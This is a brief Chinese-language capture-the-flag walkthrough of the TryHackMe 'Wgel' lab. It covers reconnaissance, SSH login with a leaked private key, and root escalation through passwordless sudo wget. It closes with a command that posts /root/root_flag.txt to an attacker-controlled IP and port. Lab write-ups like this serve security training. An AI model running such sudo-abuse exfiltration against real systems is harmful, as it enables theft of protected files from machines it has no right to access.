tryhackme--wgel靶场wp

wgel ctf writeup

nmap扫描发现开放80和22端口

进入发现是一个静态的网页，并且可以在源代码出找到一个用户名线索：Jessie

进行两次目录扫描后我们可以得到/sitemap/.ssh，在这里可以发现一个叫id_rsa的文件，看上去是个用户私钥文件。
知道了用户名和私钥，我们可以尝试远程连接。

在本地新建文件，将id_rsa的内容复制粘贴，同样保存为id_rsa ，进行远程连接：ssh -i id_rsa jessie@<ip>
成功连接

可以在Document目录下发现user_flag.txt，

根据user_flag.txt，推测根flag名为root_flag.txt。接下来想办法进行提权操作来读取。
sudo -l查看到我们可以无需密码就以root权限执行wget操作。

wget:是Linux/Unix 系统中一个强大的命令行下载工具，用于从网络上下载文件，支持 HTTP、HTTPS 和 FTP 协议。

在gtfobin上查看wget相关的提权操作，尝试了几个没成功，选择使用它给的文件上传方法

利用该方法使用wget将root_flag.txt发送到攻击机上，我们就可以读取到根flag。

执行sudo wget --post-file=/root/root_flag.txt http://<attact_ip>:4444,本地开个监听成功读取到根flag